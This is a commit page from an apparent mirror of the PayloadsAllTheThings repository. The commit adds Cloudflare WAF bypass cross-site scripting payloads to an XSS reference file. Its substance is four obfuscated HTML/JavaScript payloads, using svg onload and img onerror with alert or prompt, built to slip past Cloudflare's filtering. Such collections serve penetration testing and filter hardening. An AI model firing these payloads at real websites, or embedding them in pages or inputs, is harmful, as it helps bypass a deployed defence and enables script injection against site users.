ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update Cloudflare XSS bypasses

Browse Source 
Add 3 bypasses by Bohdan Korzhynskyi. Update twitter
This commit is contained in:
bohdansec 2020-04-22 00:51:36 +03:00 committed by GitHub
parent 2615968e96
commit c4af354d8f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
XSS Injection/README.md
View File

@ -975,7 +975,27 @@ Works for CSP like `script-src 'self' data:`
## Common WAF Bypass
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
#### 21st april 2020
```html
<svg/OnLoad="`${prompt``}`">
```
#### 22nd august 2019
```html
<svg/onload=%26nbsp;alert`bohdan`+
```
#### 5th jule 2019
```html
1'"><img/src/onerror=.1|alert``>
```
#### 3rd june 2019
```html
<svg onload=prompt%26%230000000040document.domain)>